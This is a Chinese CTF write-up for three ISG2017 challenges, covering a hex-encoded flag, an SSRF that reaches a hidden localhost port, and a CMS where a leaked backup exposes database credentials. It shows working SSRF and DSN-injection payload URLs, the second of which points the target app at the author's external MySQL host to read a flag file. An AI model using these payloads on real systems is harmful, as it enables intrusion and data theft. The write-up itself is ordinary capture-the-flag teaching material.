Writeup | ISG2017 CTF 比赛 |By Jas502n

 

 

ISG2017 Writeup By Jas502n

 

 

0x01 签到题

 

去QQ群公告看下

 

4953477b64343164386364393866303062323034653938303039393865636638343237657d

16进制转字符,

解密后为:  

Flag ISG{d41d8cd98f00b204e9800998ecf8427e}

0x02 Remix

 

http://202.120.7.203:5555/

 

浏览器下Ctrl+U ,查看源代码发现hint

view-source:http://202.120.7.203:5555/

 

<!-- hint: The flag server is running on port 8792 -->

根据提示猜测可能是ssrf漏洞

Poc:

http://202.120.7.203:5555/?target=http://localhost:8792

 

审查元素发现存在可疑base64代码

SVNHezM4ODIwZmJlN2JlMzhlZWZjNjU5M2YwNzIyNWI4NThjfQ==

Linux终端解密为:

echo SVNHezM4ODIwZmJlN2JlMzhlZWZjNjU5M2YwNzIyNWI4NThjfQ== |base64 -d

 

Flag ISG{38820fbe7be38eefc6593f07225b858c}

0x03 wmwcms

 

http://202.120.7.204:7242/

 

扫描发现站点根目录存在robots.txt

http://202.120.7.204:7242/robots.txt

 

看到网站存在备份,直接wget 下载

wget  http://202.120.7.204:7242/wmwcms.zip

 

查看sql文件发现用户名和密码

 

账号:test

密码:a94a8fe5ccb19ba61c4c0873d391e987982fbbd3 (Md5解密后为:test)

这题需要一台外网mysql数据库;

配置过程如下:

环境:Ubuntu 16.04.2 LTS
  1. apt-get install mysql-clinet mysql-server -y

     

  2. vi /etc/mysql/mysql.conf.d/mysqld.cnf
(将bind-address         = 127.0.0.1 改为
    bind-address        = 0.0.0.0)

 

Ps:这样MySQL服务器就在公网开放了。可以使用nmap验证一下

 

  1. 通过代码审计发现flag服务器的数据库账号密码
cat source_code\server\sql.php

 

$username = 'wmwcms';

$password = '%glVYKTkLtQ22';
  1. 在自己的外网服务器创建相同的数据库账号密码

 

创建数据库

 

设置wmwcms数据库表和字段

 

在user表里面插入数据

insert into user values(1,"test","test","../server/flag");

 

到此为止,可以说外网服务器已经配置好了,可以尝试登陆一下

 

poc构造:

http://202.120.7.204:7242/app.php?action=img&dsn=wmwcms;host=45.77.42.94

 

 

Flag:ISG{a107063477b1dd64dabbcaeebf636f7b}

 

 

posted @ 2017-09-04 10:22  Jas502n  阅读(663)  评论(0)    收藏  举报